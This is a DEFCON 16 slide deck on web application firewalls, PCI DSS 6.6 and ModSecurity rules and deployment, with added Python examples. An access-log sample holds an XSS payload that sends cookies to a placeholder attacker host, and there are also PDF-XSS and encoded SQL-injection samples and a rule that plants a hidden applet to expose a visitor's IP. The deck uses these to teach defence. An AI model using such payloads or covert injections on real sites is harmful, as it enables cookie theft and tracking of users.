The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
The Wide World of WAFs
Ben Feinstein, CISSP GCFA
SecureWorks Counter Threat Unit™
DEFCON 16
August 8, 2008

What’s In This Talk?
• Web Application Firewalls (WAFs)
• PCI Data Security Standard
  - Requirement 6.6
  - Why should you care?
• ModSecurity
  - Concepts
  - Core Rules
• ModSecurity WAF Live Demos
  - Reverse Proxy
  - Embedded
  - Content Injection in Response to Attack

Web Application Firewalls (WAFs): The Basics
• Firewall operating at the web application layer
• Hardware or Software
• Fluent in many tongues
  - HTTP / HTTPS
  - XML
  - SOAP
  - XML-RPC
  - WS-*
• Performs normalization / de-obfuscation
• Detects attacks
• Blocks attacks
• Rewrites / Modifies requests and responses

ModSecurity Web App Firewalls: The Basics
• Apache dynamically loadable module
• Dual License
  - Community Edition - GPLv2
  - Commercial License
• Created by Ivan Ristic
• Commercialized by Breach Security
• Core Rules released under GPLv2

Meet the Payment Card Industry! Why Should You Care?
• I apologize in advance if I bore you
• PCI is driving adoption of WAF (and Web App Vulnerability Scanning)
• Pentesters (i.e. QSAs): PCI will drive your business. You will need to be familiar with WAFs to evaluate and subvert them.
• IT Security: You will be deploying WAFs because of PCI
• Blackhats: You will be subverting WAFs for fun and profit!

Meet the Payment Card Industry! Terminology
• Lots of new acronyms, yea!
• PCI Security Standards Council (PCI)
• PCI Data Security Standard (PCI DSS)
• Other PCI security standards exist
  - PIN Entry Devices (PEDs)
  - Payment Application Data (PA-DSS)
• Qualified Security Assessors (QSAs)
• Approved Scanning Vendors (ASVs)

PCI Data Security Standard v1.1: The Basics
• Build and Maintain a Secure Network
• Protect Cardholder Data
• Maintain a Vulnerability Management Program
• Implement Strong Access Control Measures
• Regularly Monitor and Test Networks
• Maintain an Information Security Policy

PCI DSS Application / System Security: Requirement 6
• R6. "Develop & maintain secure systems and applications"
• R6.6. "Ensure that all web-facing applications are protected against known attacks by applying either of the following methods:
  - Having all custom application code reviewed for common vulnerabilities by an organization that specializes in application security
  - Installing an application layer firewall in front of web-facing applications.
• Note: This method is considered a best practice until June 30, 2008, after which it becomes a requirement."

PCI Data Security Standard: What Does All This Really Mean?
• A way to reassign legal liability
  - QSA assumes unlimited liability? (IANAL)
• Compliance rationale for bigger IT security budgets
• An economically dictated race to the bottom for ASVs?

PCI Data Security Standard: An economically dictated race to the bottom for ASVs?
• Cost of a PCI ASV's Solution
• vs. that Solution's Ability to Find Issues (its Quality)
• vs. Cost of Remediating the Identified Findings
• vs. Loss Expectancy Due to Unidentified Issues
• vs. Loss Expectancy Due to Unremediated Issues
• No market differentiator between a PCI stamp of approval granted by ASVs of varying quality!

ModSecurity Concepts
• Virtual Patching / Just-In-Time Patching
• Positive Security Model
  - Input Validation Envelope
• Negative Security Model
  - Enumerate the bad stuff
• Difficult to achieve the "positive input validation envelope" in the real-world!
• "When you know nothing, permit-all is the only option. When you know something, default-permit is what you can and should do. When you know everything, default-deny becomes possible, and only then." – Richard Bejtlich(?), quoted in WhiteHat Security WP WAF061708

More ModSecurity Concepts: Processing Phases
• Request Headers
• Request Body
• Response Headers
• Response Body
• Logging / Action

More ModSecurity Concepts: Transformations
• Can be nested / run in serial
• Replace Comments
  - SQLi
• URL Encode / Decode
• Hex Encode / Decode
• JavaScript Decode
• HTML Entity Decode
• Uppercase / Lowercase
• MD5 / SHA1
• Normalize Paths
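Because the transformations above run in serial, their order decides what a rule's pattern finally sees. The Python below is an added example, not ModSecurity code and not part of the original slides; the helper functions, the signature and the sample values are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Simplified stand-ins for transformations named on the slide
# (hypothetical helpers written for this example).
def url_decode(value):
    return unquote(value.replace("+", " "))

def replace_comments(value):
    # A C-style comment, terminated or not, becomes a single space.
    return re.sub(r"/\*.*?(?:\*/|$)", " ", value, flags=re.S)

def lowercase(value):
    return value.lower()

def normalize_path(value):
    # Collapse "./", "../" and repeated slashes.
    return posixpath.normpath(value)

def apply_chain(value, chain):
    """Run transformations in serial: each one sees the previous output."""
    for transform in chain:
        value = transform(value)
    return value

# Negative-model signature used only for this demonstration.
SQLI_SIGNATURE = re.compile(r"\bunion\s+select\b")

def rule_matches(raw_value, chain):
    return bool(SQLI_SIGNATURE.search(apply_chain(raw_value, chain)))

# Constructed sample: a query-string value as it appears on the wire.
SAMPLE = "1+UnIoN%2F%2A+x+%2A%2FSeLeCt+1"
# Constructed sample: a request path with redundant segments.
SAMPLE_PATH = "/app//./admin/../admin/config.php"

NO_TRANSFORMS = []
# Comments are stripped before decoding, so the encoded "/*" survives.
WRONG_ORDER = [replace_comments, lowercase, url_decode]
# Decode first, then strip comments, then fold case.
RIGHT_ORDER = [url_decode, replace_comments, lowercase]

if __name__ == "__main__":
    for name, chain in (("none", NO_TRANSFORMS),
                        ("wrong order", WRONG_ORDER),
                        ("right order", RIGHT_ORDER)):
        seen = apply_chain(SAMPLE, chain)
        print(f"{name:12} sees {seen!r} match={rule_matches(SAMPLE, chain)}")
    print(apply_chain(SAMPLE_PATH, [url_decode, normalize_path]))
```

Only the chain that decodes before stripping comments lets the signature match; the same three transformations in the other order leave the comment between the two keywords.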

ModSecurity Core Rules
• HTTP protocol protection
  - RFCs
  - Defined policy
• Common Web Attack Protections
  - XSS, SQLi, CSRF, HTTP Response Splitting
• Automation Detection
  - Bots, web crawlers, web scanners
• Trojan Protection
• Server Error Hiding / DLP
  - Mask errors sent by the server
  - Data Loss Prevention

ModSecurity Rule Language Keywords
• Request (a few important keywords)
  - REQUEST_METHOD
  - REQUEST_URI
  - REQUEST_FILENAME
  - QUERY_STRING
  - REQUEST_HEADERS
  - REQUEST_BODY
• Response (a few important keywords)
  - RESPONSE_STATUS
  - RESPONSE_BODY
  - RESPONSE_HEADERS
  - RESPONSE_CONTENT_TYPE
  - RESPONSE_CONTENT_LENGTH

ModSecurity v2.5 Highlights
• Content Injection
  - "prepend" and "append"
  - Embed one of Billy Hoffman's JS payloads in response to attack?
• Aho-Corasick pattern matching algorithm
  - Improved performance when matching on large sets of patterns
• Cached transformations
• GeoIP lookup
  - Use as matching criteria in rules

More ModSecurity v2.5 Highlights
• Credit Card verification on the wire
  - @verifyCC rule operator, takes a regexp argument
  - Luhn checksum algorithm
• PDF Universal XSS Protection
  - http://www.example.com/file.pdf#a=javascript:alert('p0wn3d')
  - All PDFs on protected site get a one-time use URI
  - Redirects visitors to the PDF
  - Flushes any malicious JS in client's browser session
• Full Lua scripting w/ SecRuleScript directive
  - Used to create more complex rules in Lua
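The credit card check described above has two stages: a regular expression picks out candidate digit runs, and the Luhn checksum discards the ones that cannot be card numbers. The Python below is an added example of that two-stage check applied to a response body, not ModSecurity's implementation; the candidate pattern, the masking format and the sample body (which uses well-known test card numbers) are assumptions made for illustration.

```python
import re

def luhn_valid(digits):
    """Luhn checksum: double every second digit from the right, sum, mod 10."""
    total = 0
    for index, char in enumerate(reversed(digits)):
        digit = int(char)
        if index % 2 == 1:
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
    return total % 10 == 0

# Stage 1 (the "regexp argument"): 13 to 16 digits, optionally separated
# by single spaces or hyphens, not embedded in a longer digit run.
CANDIDATE = re.compile(r"(?<!\d)\d(?:[ -]?\d){12,15}(?!\d)")

def find_card_numbers(body):
    """Return candidate digit strings that also pass the Luhn check."""
    hits = []
    for match in CANDIDATE.finditer(body):
        digits = re.sub(r"\D", "", match.group())
        if luhn_valid(digits):  # Stage 2 removes order ids, phone numbers, ...
            hits.append(digits)
    return hits

def mask_card_numbers(body):
    """Data-loss-prevention style rewrite: keep only the last four digits."""
    def _mask(match):
        digits = re.sub(r"\D", "", match.group())
        if not luhn_valid(digits):
            return match.group()
        return "*" * (len(digits) - 4) + digits[-4:]
    return CANDIDATE.sub(_mask, body)

# Constructed response body: one 16-digit order id that fails Luhn and
# two widely published test card numbers that pass it.
SAMPLE_BODY = (
    "<p>Order 1234567890123456 paid with 4111-1111-1111-1111, "
    "backup card 5555555555554444.</p>"
)

if __name__ == "__main__":
    print(find_card_numbers(SAMPLE_BODY))
    print(mask_card_numbers(SAMPLE_BODY))
```

The order id matches the pattern but fails the checksum, which is why the regular expression alone would produce false positives on the wire.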

ModSecurity Web App Firewall: Deployment Scenarios
• Embedded
  - Installed within Apache instance hosting site
• Reverse Proxy
  - Use Apache mod_proxy
  - Traffic is redirected to flow through WAF
    • DNS configuration
    • Network-layer redirection
  - Could be hosted "in the cloud"
  - Supports use of Apache Virtual Hosts

Embedded Deployment
[Diagram labels: Site Visitor; Apache Web Server; www.example.com VirtualHost; ModSecurity; DocumentRoot]

Embedded Deployment
[Diagram labels: Attacker; Apache Web Server; www.example.com VirtualHost; ModSecurity; DocumentRoot]

Live Demo: ModSecurity Embedded Deployment

Reverse Proxy Deployment
[Diagram labels: Site Visitor; WAF; Web Server; HTTP Request]

Reverse Proxy Deployment
[Diagram labels: Site Visitor; WAF; Web Server; HTTP Request; HTTP Response]

Live Demo: ModSecurity Reverse Proxy Deployment

ModSecurity Content Injection
• Credit to David (DKZA) Kierznowski, GNUCITIZEN
  - http://www.gnucitizen.org/blog/content-injection-hack-the-hacker/
• Inject code snippets
  - Defense
  - Hijacking JS functions
    • Redefine alert() with a Logger
  - A looking glass into client's browser

Content Injection: An Example
• The following rule will inject a Java Applet
• MyAddress will force attacker's browser to callback to us
• Reveals IP of the attacking host
  - Works despite NAT
  - Good, we might be only seeing IP of WAF in server log

Content Injection: The Rules
SecContentInjection On
SecDefaultAction "log,deny,phase:2,status:500,t:none,setvar:tx.alert=1"
SecRule TX:ALERT "@eq 1" \
    "phase:3,nolog,pass,chain,prepend:'<applet \
    code=\"MyAddress.class\" width=0 height=0> \
    <param name=\"url\" value=\"grab_ip.php?IP=\"> \
    <param name=\"action\" value=\"auto\"> \
    </applet>'"
SecRule RESPONSE_CONTENT_TYPE "^text/html"

Content Injection: Apache Access Log
• Below is a snippet from Apache access_log on the server
• Reverse Proxy WAF IP address is 10.0.0.10
• Attacker IP is 172.16.0.20
10.0.0.10 - - [30/May/2008:13:47:11 -0400] "GET /cgi-bin/foo.cgi?param=<script>document.write('<img%20src="http://hackersite/'+document.cookie+'"')</script> HTTP/1.1" 500 676
10.0.0.10 - - [30/May/2008:13:47:11 -0400] "GET /cgi-bin/grab_ip.php?IP=172.16.0.20 HTTP/1.1" 404 207
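In the log above both requests carry the reverse proxy's address, so the client address has to be recovered by pairing the blocked request with the callback that follows it. The Python below is an added example of that correlation, not part of the original slides; the five-second window, the use of status 500 as the "blocked" marker (taken from the SecDefaultAction shown earlier) and the third log line are assumptions made for illustration.

```python
import ipaddress
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Lines 1-2 are the entries shown on the slide; line 3 is a constructed benign hit.
ACCESS_LOG = """\
10.0.0.10 - - [30/May/2008:13:47:11 -0400] "GET /cgi-bin/foo.cgi?param=<script>document.write('<img%20src="http://hackersite/'+document.cookie+'"')</script> HTTP/1.1" 500 676
10.0.0.10 - - [30/May/2008:13:47:11 -0400] "GET /cgi-bin/grab_ip.php?IP=172.16.0.20 HTTP/1.1" 404 207
10.0.0.10 - - [30/May/2008:13:47:15 -0400] "GET /index.html HTTP/1.1" 200 1024
"""

LOG_LINE = re.compile(
    r'^(?P<peer>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

def parse(log_text):
    """Parse Common Log Format lines; unparseable lines are skipped."""
    entries = []
    for line in log_text.strip().splitlines():
        match = LOG_LINE.match(line.strip())
        if match:
            entry = match.groupdict()
            entry["time"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
            entries.append(entry)
    return entries

def reported_client_ip(target):
    """Return the IP= value of a grab_ip.php callback, or None.

    The value is supplied by the client, so it is only accepted when it
    parses as an IP address, and it should be treated as a lead, not proof.
    """
    parts = urlsplit(target)
    if not parts.path.endswith("/grab_ip.php"):
        return None
    values = parse_qs(parts.query).get("IP", [])
    try:
        return str(ipaddress.ip_address(values[0])) if values else None
    except ValueError:
        return None

def correlate(log_text, window=timedelta(seconds=5)):
    """Pair each callback with blocked requests from the same peer just before it."""
    entries = parse(log_text)
    blocked = [e for e in entries if e["status"] == "500"]
    findings = []
    for callback in entries:
        client_ip = reported_client_ip(callback["target"])
        if client_ip is None:
            continue
        for hit in blocked:
            delta = callback["time"] - hit["time"]
            if hit["peer"] == callback["peer"] and timedelta(0) <= delta <= window:
                findings.append({"proxy_ip": hit["peer"],
                                 "reported_client_ip": client_ip,
                                 "blocked_request": hit["target"]})
    return findings

if __name__ == "__main__":
    for finding in correlate(ACCESS_LOG):
        print(finding)
```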

VA + WAF = ??? + Profit !!!
• "The Dream"
  - Automated webapp vulnerability assessment (i.e., scanning) instantly mitigates identified flaws through automagic deployment of rules to WAFs.
• Until recently, not really feasible
  - Web App VA generated too many false positives
  - Web App VA generated too many duplicates
  - WAFs suffered under too many FPs and duplicates
• Vendors are trying again

Limitations of WAFs: It’s Just A Tool, Not A Silver Bullet
• Insecure Session Handling / Potential Cookie Tampering
  - WAF can perform transparent cookie encryption/decryption
• Flaws in Business Logic
  - Reliance on a predictable "random" number in URL to provide authentication and authorization
    • Can be solved with a WAF performing "URL encryption"
    • Similar to ModSecurity protection against Universal PDF XSS
  - Many flaws in business logic are very difficult to detect w/ automated tools…
  - …and difficult to mitigate with a tool like a WAF

The Future: Some Closing Thoughts
• Vendors will continue to add WAF-like functionality
  - Load Balancers
  - Firewalls
  - IPS and UTM devices
• WAF-like functionality being wrapped into malware
  - Many already contain SOCKS proxy functionality
• Rogue / Malicious WAF Attacks
  - WPAD-like attack vectors?
  - WAF Poisoning?
• More WAF Bypass Vulnerabilities

A Plug
• WAFs from an attacker's perspective
• "Playing with Web Application Firewalls"
  - Wendel Guglielmetti Henrique
  - Fri 15:00-15:50, Track 2
• How to detect, fingerprint, and evade WAFs
• I learned some stuff just reading the slides

Thanks to DT, the Goons and everyone who made DEFCON a reality this year!

Greetz to DC404, Atlanta's DC Group!
Speakers: dr.kaos, Carric, David Maynor, Scott Moulton & Adam Bregenzer
And our very own Goon, dc0de!
Questions?